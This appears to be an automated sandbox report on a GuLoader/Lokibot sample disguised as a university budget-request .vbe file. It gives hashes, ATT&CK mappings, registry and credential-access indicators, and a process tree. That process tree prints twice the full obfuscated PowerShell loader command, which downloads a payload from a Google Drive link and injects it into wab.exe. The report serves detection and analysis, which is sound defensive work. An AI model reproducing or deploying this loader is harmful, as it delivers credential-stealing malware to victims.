guloader | e2fda069aeb3745872935ff4b9ed64ce7f40cae6b6b57a7f4bfb37a01d9178b1

General

Target

BUDGET REQUEST (University of Brasilia) 05-09-2024.vbe
Size

25KB
MD5

3ccecc201a02a447e202b789225d485a
SHA1

3f862aa3bd5a63377d92bda94fde52fb6117787f
SHA256

5818ebc075a84b23c0e75e871bd910fa656d9f5e39f96a9e23ff15d10b4b1fad
SHA512

5ca42afdc12633066081134fcaea9a5fec2f4095997a62b1a80e1b7bcefa0eec1a6bc57f1f1d26907ddb3ebf5831a92fe0b64d7a4fb8620caaf7b36dbd8e29e0
SSDEEP

384:Vwm8rpPNSoc8/zHXzM18KL20GrPWRIdbiKiz:58C6D2Er2ozY

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
18	1996	powershell.exe
20	1996	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1996	powershell.exe
4244	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	drive.google.com
18	drive.google.com
41	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3064	wab.exe
3064	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4244	powershell.exe
3064	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4244 set thread context of 3064	4244	powershell.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1996	powershell.exe
1996	powershell.exe
4244	powershell.exe
4244	powershell.exe
4244	powershell.exe
4244	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4244	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	3064	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2208 wrote to memory of 1996	2208	WScript.exe	93
PID 2208 wrote to memory of 1996	2208	WScript.exe	93
PID 1996 wrote to memory of 4948	1996	powershell.exe	95
PID 1996 wrote to memory of 4948	1996	powershell.exe	95
PID 1996 wrote to memory of 4244	1996	powershell.exe	104
PID 1996 wrote to memory of 4244	1996	powershell.exe	104
PID 1996 wrote to memory of 4244	1996	powershell.exe	104
PID 4244 wrote to memory of 4888	4244	powershell.exe	105
PID 4244 wrote to memory of 4888	4244	powershell.exe	105
PID 4244 wrote to memory of 4888	4244	powershell.exe	105
PID 4244 wrote to memory of 3064	4244	powershell.exe	106
PID 4244 wrote to memory of 3064	4244	powershell.exe	106
PID 4244 wrote to memory of 3064	4244	powershell.exe	106
PID 4244 wrote to memory of 3064	4244	powershell.exe	106
PID 4244 wrote to memory of 3064	4244	powershell.exe	106

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BUDGET REQUEST (University of Brasilia) 05-09-2024.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Runspace) {$Kolsunsraelerne++;$Lovmssige='Immoderate';$Killig='su';$Lovmssige+='Havocs';$Killig+='bs';$Lovmssige+='Grady';$Killig+='tr';$Lovmssige+='Unworshiped';}$Killig+='ing';Function Motorpace($Resundssejladser){$Exostome=$Resundssejladser.Length-$Kolsunsraelerne;For( $Kolsun=5;$Kolsun -lt $Exostome;$Kolsun+=6){$Navneliste+=$Resundssejladser.$Killig.'Invoke'( $Kolsun, $Kolsunsraelerne);}$Navneliste;}function Svmmedykker($Obligative){ & ($Polytope) ($Obligative);}$Styrkendes46=Motorpace '.utelMshea.oSkridzAltsaiAevitlScalelSammeaTorvo/Socio5til r.Narko0K rav Envio( UnbrWElectiRewirn.olumdTaleloB.belwLangesSa,bh TolkN G itTForsr rik1 ,all0Porre.Malei0Consu;.orla RegraW Aad i G rgnporen6S,yrt4Medta;Udklk VoluxTra,s6 Ecph4Gents;Viden VejarrVirt.varter:Not.t1Un os2Chefa1di,th.Irrev0Anaye) Kabe TrampG .htheG nskc ColekClipeo Enl,/Vakuu2Meane0S.ati1Supra0Matgr0 tjen1Strat0 N.mb1Sprog fo trFOctasiAutorrUde veHu,rofR adioUnr,cxMater/Salls1Ane o2 Be.z1 Bdni.Car l0djae. ';$Afkastningsgraden=Motorpace ' DyreUVolcasSpiegeWhereru,fen-FejlpACordegPhysaeSpa ynUdmejtKlude ';$Overskudsproduktions=Motorpace 'Male h ladatLyds t FlyvpDiv.rs Bifo:Organ/Plat / T ltd AritrBebygiA.besvPolype Side. TeglgHun,ro Bucko,ulvegRe irlGargee Anti. Ov,rc S leoProlomBispe/ scheuCinclcEvent?UpshoeJod,ix escap Sk,noPatiercatabtProev=Card dAnagoos.baxwProemnFuldflinteroParamaRekomdalbin&rudleibi,pod Atte=Anisa1 Unre6ImmanuDilet3Jewel7Semibzh.loa4Maks,r Thaub Be,iQRen.ay Taut0StaveHSatelPCo.ar9Al,odwDraftK Gr.mr KrluhChondpDet.iHbl.ff-Que,siZaneletrekki E thI nummm Impo1sp rgXRayleWOrkan_Hyd,oTUnex 2Trykp ';$Lactamide=Motorpace 'Inddm>Tro.l ';$Polytope=Motorpace 'ProphiBa dieRegnixUnspl ';$ron='Chronics';$Wineglassful = Motorpace 'AfslreMarkecPotchhPandeoCa th netv.% onfaL,stnpOrganpInsemd pureaApprotIsogoaUnde %Hemat\DefloCSpe krPu.keuFormalGyptol co.teRhyn rGrund.CommiMHampeiStaalkM.gma Tings&Mi be&Hamun T.theeCalumcS.genh,ruknoUnder kyssetPisti ';Svmmedykker (Motorpace 'Rgsky$SymmegAfmillCoat oBrdknbHarkaaIn.amlAngli: FanwKCon,ee GarlrScleriBegobtOrg,neUnapp= ove,(U.wancPacifm CuridOr.eg Catab/P niscRelet Funki$GravyW,onchiG,bbenpentae PedigJuramlBeskfa,ermisKup,esObligfBrd,nuWomp lB,sta)Amt,r ');Svmmedykker (Motorpace ' Mar,$VirgugPsychlFj,rnoAfdelb Cel,aCoparlIm le:Erog G as iu .ypelValfasTaktloSpa etroe,eeSkraanRing,sKvart=Drugs$.iponOso,kpvBrug.eKoop.r kiftsPiskek .orkuEgensdAdm.rsP,stipVerderFej.hoHepatd SymmueventkDykketUn omi,nwhioUtaknn BusesVenen.Ba,dss ResypLipinlAbitui onc,tDynge(,odav$Ki keLTa,taaskja cSoci.tVernaaTessemBrneci KontdFremaeSuper)No,pa ');Svmmedykker (Motorpace 'Ove,l[DiaziNProv.eWagprtLeg m.R,tsjS,rifteGenbrrAzotevPoly iPh.rmc.ikkeeGlucaPapishoTablii SubcnC.rchtAssurMOptima OmsknBolleaSepargCarboe,lodsr Antl]Tyran: Sa.o: CormSUnbareSlavecOdinsuCeramr MicriMol,itDugaly EnaaPSlumrrDiesioGasmat JomfoEpi,ycN,nexoRecallRems Simpl=Aridi Scrub[Om,anN AnteeSkotjtKoe s.L denSman,aeFlam cFron,u I,strTimesiFrladt KyshyFuderPAtropr Bes.o DriktNontooTindecVirkeoEncoml SkolTTailty .vesplejl.e Esse] Data:Gisla:FabriTAffallSol.asBeg,n1 samm2Begrl ');$Overskudsproduktions=$Gulsotens[0];$logoet= (Motorpace 'Merom$CommugHarb.lGuerio eliub.ntera Wh plUdda,:adminI ranmNectapfo.ete nterr basiaNoveltDel,eiDiesev andsaUn.hol Tegn=SurreN scute Da,bw Irv -B olaOEpigrb Tll jFl,adeKoge.cFr,srt Spee Viri SUn ocy.estasGlucotColleeSambumSstvl.Gide.N,alisePur ltD.ese.budgeW Gay eMktubb,icklC FremlAgrobiContrei,mignFryset');$logoet+=$Kerite[1];Svmmedykker ($logoet);Svmmedykker (Motorpace 'bl.dh$G nufIOccidmTrachpDekode TolirUnderaFlui.tHalvfiU dervkla.ma DefilVwasy.Co bsH TriweVerdeauls ldGideoeeurylrvid,esCohob[ Sand$AdaptAMentafUnwi.kTi flaStandsPrefitUnde,n GebniKdedanAnem gmani s TyvagHallurMisasaTaskedTilile Indtn U de] Tyro=Acant$ForsyS.eepit Afd.ytypolr skarkPerfeeInd anLucerdInteneFrysesCla.p4 Bazo6.kspe ');$Ternet=Motorpace 'F.tek$ Af.rIAdrammDrepap SpeceAmbivrracedaApplitTresiiDiskevJanicaPa,nelSquet.TerseDTelevo Analw EjennDeforllin.eoMarloa ekvdco.ceFUdst iInjeclAutodeOvert(Haand$KolleODopsiv Lagee Rawlr.inolsAggrekSyss,uSelskd isplsAlle pGammerGe,neoFavnedJordluLreprkTrematr.sigiSubcroPredenUnrevsGenin, Leve$HulebU.rokbnBajadaPara.l.ecitl SanceHjmosvTab ei RantaTempetBereteV.ndidAks,e) sl.a ';$Unalleviated=$Kerite[0];Svmmedykker (Motorpace 'Mandi$Krte,gSamb l SubeoOpsp bAbbotaTeks.lTempe: GudsSParisaTeenakColocrSympoaRhombmFleere,robrnP,lydtExhaleNaturrSk ten fsmetriam=F.tni( ca oT Theoe Neohs Start Worr-Band,PT,lanaHydrotAd udhGim e W,rld$.illeUCykelnNeddmaUltral NonmlConseeG.ndbvOverdiRavenaSynopt Ke,ne,alavdTavle)reexc ');while (!$Sakramenterne) {Svmmedykker (Motorpace 'massr$Se chg.ardilMomseog.nskbHonnraGisehl skrm: Hy,eOHylder Gen,lD,preoStofsv.ermaedistrnSti,l=Non p$ ParktTer.irD voruGedebe ,ton ') ;Svmmedykker $Ternet;Svmmedykker (Motorpace ' noncSSortitKonkuak.agurP eidtKaals-Mult,SEla.hlUd oreMegape GonopBrewi Skrve4Skump ');Svmmedykker (Motorpace 'Reimp$Sunkng BdstlCommeoFlashbI digaSa.frlM.ria: ChonSStjeraSophik F.rhrVes ia ,ndemkeftieBrugenOstertBrylle BullrSvaghnTryk,evaria=Pla m(MurarTMrkese T lfsFerietforb - SeedPBystya thanteft.rhAffre Pools$ToaggUGid en FalkaClepelkonkulFar ee Pap,vt,erai Dagha Gargt AlloeRgvardPondt)Nonre ') ;Svmmedykker (Motorpace ' ubd$Ne,otg,orbelAc,eso Shirbtin,eaDisenlMunte:UnderC,atofeTriviy ,dtul,parlokvartnFjernsN,ncl= othe$RowelgBellylRock oSanktb krudaPolyclRen,e:EngleSTraumk K ntrRoseluKbe,obSegrenMortiiGiggenSy eegTe,mseSk aanBewor+Semip+ Dise% itt$TomahGEkspeu Regil V.sts BramoMolekt.krube A,tenHan,esSpira.GoodicmelodoTetrauVejkanMug.tt Scre ') ;$Overskudsproduktions=$Gulsotens[$Ceylons];}$Unbendably=336468;$Bullterrier=28207;Svmmedykker (Motorpace 'Scoff$ VarigStranlK uteoTcphobSolliaJuniol,dbyd: cameHBombev kiasi Crocd Pa.ltUndereEhrlikKininaBarbrl Unctkt.mpeeLivsfn elissKlukf Averr= Wils Tred.GVo.eeeHol,ytAimau-BundfC ProgoOrd.in tentFladteD prenAb ictSkald ,ivet$Zit aUStjern GrataStipul SkaklMiscieMigrav SithiKva,ta Sal,tCoelie.peradad,en ');Svmmedykker (Motorpace 'Under$Syns,gScumllLogheoTu,bib Het.aD,faulKolla:TransGEksiluGushen ,ypohRanchoMobniuVert.sUnc,oe Neph Circu= Echi T,len[.ireaSKarboyf revsAdyn,tMouileVowelmtropo.LanatC IndioLyssinSpidsvWickieAma grbenvntBowle] bnin:Be.oe:HerbaFFedesrDevisoUnd,rmP.rsoBUdenra DrifsDem peLag,r6Ignes4Mi erSDa.eft VertrSkrueiInt rn P evgmikro(Union$ DiveHCoweevKvadriFledgdvagtttdistieB,rnskAnt.faFod tlIndskk KeraeKalkmnbevges,nfan)Yoghp ');Svmmedykker (Motorpace 'Snoha$.plengNaboilProprodemobbSubina SmaglRec,n:F.oksPM.unto heartRelabhHydr.oLoftrl Wo,kd arbeeMode r sem sBolig Lime= Mi k Morth[ ZoosSBarquyk,mprs H nktRi oseHalerm Post.UddatTAlk,ne.atinx Landt Pol .OccidEFaunanSekt,cUns,aoTangndHor eiSvo lnTrochgBlink] pron:Af.ed:KontaABrairSAwhirCPreorIHistoILonqu.AtrieGLee aeWhutet MiniSHaimatBegarrAstmaiAttrin InfagKonse( Lati$Ho,tiGnonfauI scrn.iscphLtappo arg uFu dasDilateRivej)snurr ');Svmmedykker (Motorpace ',ehov$MisevgJagtglGetaho Sofab InteaHerculSaddl:empirTFormielmmelsPeberaRestrrUngmeoPersovnyoriiDolbyt SolscPrapshIn.an=Konso$AktriP HakooOrrhotBkkenhIambioProtolfo,uldNearaeRe.irr K.mms.rgue.ChilosSve juRump bCrostsTumbrtBenefr Cr.ni Jrgin TestgRaffi(Komme$ PlasUAmp.in Pachb nanieUforsnArbejd.ubfoaRenhobBanjolForstyLngde,Jomfr$PersoBMigh uIncoolParadlN.dpltFloodePhilirParalrMormoiSuitleB mberUnico)Attra ');Svmmedykker $Tesarovitch;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cruller.Mik && echo t"
    3⤵
    PID:4948
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Runspace) {$Kolsunsraelerne++;$Lovmssige='Immoderate';$Killig='su';$Lovmssige+='Havocs';$Killig+='bs';$Lovmssige+='Grady';$Killig+='tr';$Lovmssige+='Unworshiped';}$Killig+='ing';Function Motorpace($Resundssejladser){$Exostome=$Resundssejladser.Length-$Kolsunsraelerne;For( $Kolsun=5;$Kolsun -lt $Exostome;$Kolsun+=6){$Navneliste+=$Resundssejladser.$Killig.'Invoke'( $Kolsun, $Kolsunsraelerne);}$Navneliste;}function Svmmedykker($Obligative){ & ($Polytope) ($Obligative);}$Styrkendes46=Motorpace '.utelMshea.oSkridzAltsaiAevitlScalelSammeaTorvo/Socio5til r.Narko0K rav Envio( UnbrWElectiRewirn.olumdTaleloB.belwLangesSa,bh TolkN G itTForsr rik1 ,all0Porre.Malei0Consu;.orla RegraW Aad i G rgnporen6S,yrt4Medta;Udklk VoluxTra,s6 Ecph4Gents;Viden VejarrVirt.varter:Not.t1Un os2Chefa1di,th.Irrev0Anaye) Kabe TrampG .htheG nskc ColekClipeo Enl,/Vakuu2Meane0S.ati1Supra0Matgr0 tjen1Strat0 N.mb1Sprog fo trFOctasiAutorrUde veHu,rofR adioUnr,cxMater/Salls1Ane o2 Be.z1 Bdni.Car l0djae. ';$Afkastningsgraden=Motorpace ' DyreUVolcasSpiegeWhereru,fen-FejlpACordegPhysaeSpa ynUdmejtKlude ';$Overskudsproduktions=Motorpace 'Male h ladatLyds t FlyvpDiv.rs Bifo:Organ/Plat / T ltd AritrBebygiA.besvPolype Side. TeglgHun,ro Bucko,ulvegRe irlGargee Anti. Ov,rc S leoProlomBispe/ scheuCinclcEvent?UpshoeJod,ix escap Sk,noPatiercatabtProev=Card dAnagoos.baxwProemnFuldflinteroParamaRekomdalbin&rudleibi,pod Atte=Anisa1 Unre6ImmanuDilet3Jewel7Semibzh.loa4Maks,r Thaub Be,iQRen.ay Taut0StaveHSatelPCo.ar9Al,odwDraftK Gr.mr KrluhChondpDet.iHbl.ff-Que,siZaneletrekki E thI nummm Impo1sp rgXRayleWOrkan_Hyd,oTUnex 2Trykp ';$Lactamide=Motorpace 'Inddm>Tro.l ';$Polytope=Motorpace 'ProphiBa dieRegnixUnspl ';$ron='Chronics';$Wineglassful = Motorpace 'AfslreMarkecPotchhPandeoCa th netv.% onfaL,stnpOrganpInsemd pureaApprotIsogoaUnde %Hemat\DefloCSpe krPu.keuFormalGyptol co.teRhyn rGrund.CommiMHampeiStaalkM.gma Tings&Mi be&Hamun T.theeCalumcS.genh,ruknoUnder kyssetPisti ';Svmmedykker (Motorpace 'Rgsky$SymmegAfmillCoat oBrdknbHarkaaIn.amlAngli: FanwKCon,ee GarlrScleriBegobtOrg,neUnapp= ove,(U.wancPacifm CuridOr.eg Catab/P niscRelet Funki$GravyW,onchiG,bbenpentae PedigJuramlBeskfa,ermisKup,esObligfBrd,nuWomp lB,sta)Amt,r ');Svmmedykker (Motorpace ' Mar,$VirgugPsychlFj,rnoAfdelb Cel,aCoparlIm le:Erog G as iu .ypelValfasTaktloSpa etroe,eeSkraanRing,sKvart=Drugs$.iponOso,kpvBrug.eKoop.r kiftsPiskek .orkuEgensdAdm.rsP,stipVerderFej.hoHepatd SymmueventkDykketUn omi,nwhioUtaknn BusesVenen.Ba,dss ResypLipinlAbitui onc,tDynge(,odav$Ki keLTa,taaskja cSoci.tVernaaTessemBrneci KontdFremaeSuper)No,pa ');Svmmedykker (Motorpace 'Ove,l[DiaziNProv.eWagprtLeg m.R,tsjS,rifteGenbrrAzotevPoly iPh.rmc.ikkeeGlucaPapishoTablii SubcnC.rchtAssurMOptima OmsknBolleaSepargCarboe,lodsr Antl]Tyran: Sa.o: CormSUnbareSlavecOdinsuCeramr MicriMol,itDugaly EnaaPSlumrrDiesioGasmat JomfoEpi,ycN,nexoRecallRems Simpl=Aridi Scrub[Om,anN AnteeSkotjtKoe s.L denSman,aeFlam cFron,u I,strTimesiFrladt KyshyFuderPAtropr Bes.o DriktNontooTindecVirkeoEncoml SkolTTailty .vesplejl.e Esse] Data:Gisla:FabriTAffallSol.asBeg,n1 samm2Begrl ');$Overskudsproduktions=$Gulsotens[0];$logoet= (Motorpace 'Merom$CommugHarb.lGuerio eliub.ntera Wh plUdda,:adminI ranmNectapfo.ete nterr basiaNoveltDel,eiDiesev andsaUn.hol Tegn=SurreN scute Da,bw Irv -B olaOEpigrb Tll jFl,adeKoge.cFr,srt Spee Viri SUn ocy.estasGlucotColleeSambumSstvl.Gide.N,alisePur ltD.ese.budgeW Gay eMktubb,icklC FremlAgrobiContrei,mignFryset');$logoet+=$Kerite[1];Svmmedykker ($logoet);Svmmedykker (Motorpace 'bl.dh$G nufIOccidmTrachpDekode TolirUnderaFlui.tHalvfiU dervkla.ma DefilVwasy.Co bsH TriweVerdeauls ldGideoeeurylrvid,esCohob[ Sand$AdaptAMentafUnwi.kTi flaStandsPrefitUnde,n GebniKdedanAnem gmani s TyvagHallurMisasaTaskedTilile Indtn U de] Tyro=Acant$ForsyS.eepit Afd.ytypolr skarkPerfeeInd anLucerdInteneFrysesCla.p4 Bazo6.kspe ');$Ternet=Motorpace 'F.tek$ Af.rIAdrammDrepap SpeceAmbivrracedaApplitTresiiDiskevJanicaPa,nelSquet.TerseDTelevo Analw EjennDeforllin.eoMarloa ekvdco.ceFUdst iInjeclAutodeOvert(Haand$KolleODopsiv Lagee Rawlr.inolsAggrekSyss,uSelskd isplsAlle pGammerGe,neoFavnedJordluLreprkTrematr.sigiSubcroPredenUnrevsGenin, Leve$HulebU.rokbnBajadaPara.l.ecitl SanceHjmosvTab ei RantaTempetBereteV.ndidAks,e) sl.a ';$Unalleviated=$Kerite[0];Svmmedykker (Motorpace 'Mandi$Krte,gSamb l SubeoOpsp bAbbotaTeks.lTempe: GudsSParisaTeenakColocrSympoaRhombmFleere,robrnP,lydtExhaleNaturrSk ten fsmetriam=F.tni( ca oT Theoe Neohs Start Worr-Band,PT,lanaHydrotAd udhGim e W,rld$.illeUCykelnNeddmaUltral NonmlConseeG.ndbvOverdiRavenaSynopt Ke,ne,alavdTavle)reexc ');while (!$Sakramenterne) {Svmmedykker (Motorpace 'massr$Se chg.ardilMomseog.nskbHonnraGisehl skrm: Hy,eOHylder Gen,lD,preoStofsv.ermaedistrnSti,l=Non p$ ParktTer.irD voruGedebe ,ton ') ;Svmmedykker $Ternet;Svmmedykker (Motorpace ' noncSSortitKonkuak.agurP eidtKaals-Mult,SEla.hlUd oreMegape GonopBrewi Skrve4Skump ');Svmmedykker (Motorpace 'Reimp$Sunkng BdstlCommeoFlashbI digaSa.frlM.ria: ChonSStjeraSophik F.rhrVes ia ,ndemkeftieBrugenOstertBrylle BullrSvaghnTryk,evaria=Pla m(MurarTMrkese T lfsFerietforb - SeedPBystya thanteft.rhAffre Pools$ToaggUGid en FalkaClepelkonkulFar ee Pap,vt,erai Dagha Gargt AlloeRgvardPondt)Nonre ') ;Svmmedykker (Motorpace ' ubd$Ne,otg,orbelAc,eso Shirbtin,eaDisenlMunte:UnderC,atofeTriviy ,dtul,parlokvartnFjernsN,ncl= othe$RowelgBellylRock oSanktb krudaPolyclRen,e:EngleSTraumk K ntrRoseluKbe,obSegrenMortiiGiggenSy eegTe,mseSk aanBewor+Semip+ Dise% itt$TomahGEkspeu Regil V.sts BramoMolekt.krube A,tenHan,esSpira.GoodicmelodoTetrauVejkanMug.tt Scre ') ;$Overskudsproduktions=$Gulsotens[$Ceylons];}$Unbendably=336468;$Bullterrier=28207;Svmmedykker (Motorpace 'Scoff$ VarigStranlK uteoTcphobSolliaJuniol,dbyd: cameHBombev kiasi Crocd Pa.ltUndereEhrlikKininaBarbrl Unctkt.mpeeLivsfn elissKlukf Averr= Wils Tred.GVo.eeeHol,ytAimau-BundfC ProgoOrd.in tentFladteD prenAb ictSkald ,ivet$Zit aUStjern GrataStipul SkaklMiscieMigrav SithiKva,ta Sal,tCoelie.peradad,en ');Svmmedykker (Motorpace 'Under$Syns,gScumllLogheoTu,bib Het.aD,faulKolla:TransGEksiluGushen ,ypohRanchoMobniuVert.sUnc,oe Neph Circu= Echi T,len[.ireaSKarboyf revsAdyn,tMouileVowelmtropo.LanatC IndioLyssinSpidsvWickieAma grbenvntBowle] bnin:Be.oe:HerbaFFedesrDevisoUnd,rmP.rsoBUdenra DrifsDem peLag,r6Ignes4Mi erSDa.eft VertrSkrueiInt rn P evgmikro(Union$ DiveHCoweevKvadriFledgdvagtttdistieB,rnskAnt.faFod tlIndskk KeraeKalkmnbevges,nfan)Yoghp ');Svmmedykker (Motorpace 'Snoha$.plengNaboilProprodemobbSubina SmaglRec,n:F.oksPM.unto heartRelabhHydr.oLoftrl Wo,kd arbeeMode r sem sBolig Lime= Mi k Morth[ ZoosSBarquyk,mprs H nktRi oseHalerm Post.UddatTAlk,ne.atinx Landt Pol .OccidEFaunanSekt,cUns,aoTangndHor eiSvo lnTrochgBlink] pron:Af.ed:KontaABrairSAwhirCPreorIHistoILonqu.AtrieGLee aeWhutet MiniSHaimatBegarrAstmaiAttrin InfagKonse( Lati$Ho,tiGnonfauI scrn.iscphLtappo arg uFu dasDilateRivej)snurr ');Svmmedykker (Motorpace ',ehov$MisevgJagtglGetaho Sofab InteaHerculSaddl:empirTFormielmmelsPeberaRestrrUngmeoPersovnyoriiDolbyt SolscPrapshIn.an=Konso$AktriP HakooOrrhotBkkenhIambioProtolfo,uldNearaeRe.irr K.mms.rgue.ChilosSve juRump bCrostsTumbrtBenefr Cr.ni Jrgin TestgRaffi(Komme$ PlasUAmp.in Pachb nanieUforsnArbejd.ubfoaRenhobBanjolForstyLngde,Jomfr$PersoBMigh uIncoolParadlN.dpltFloodePhilirParalrMormoiSuitleB mberUnico)Attra ');Svmmedykker $Tesarovitch;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cruller.Mik && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4888
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:3064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4028,i,8231329449558834090,4540802069600791165,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:8
1⤵
PID:1992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4gwlfrnb.ls0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Cruller.Mik

Filesize
474KB

MD5
7a4d866c9a355a3e65375c8b5856be93

SHA1
44c0ce7c7677d9128ed1a1b505ae162c731bf835

SHA256
ff0f7ed7556903ab34580bbe56f754e0854b8cef7b92419f578a8a9e467de78e

SHA512
7533cb3a2f373271ddf9bbcab504acfccb7deb03d3f778ec4e63e3412b39d5c9dc7b51fe98abd08c307a97630b89915d30d36a197880c64054a72d339828ace5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2170637797-568393320-3232933035-1000\0f5007522459c86e95ffcc62f32308f1_76278eb0-9988-43b4-9423-af5897ebbcb4

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2170637797-568393320-3232933035-1000\0f5007522459c86e95ffcc62f32308f1_76278eb0-9988-43b4-9423-af5897ebbcb4

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
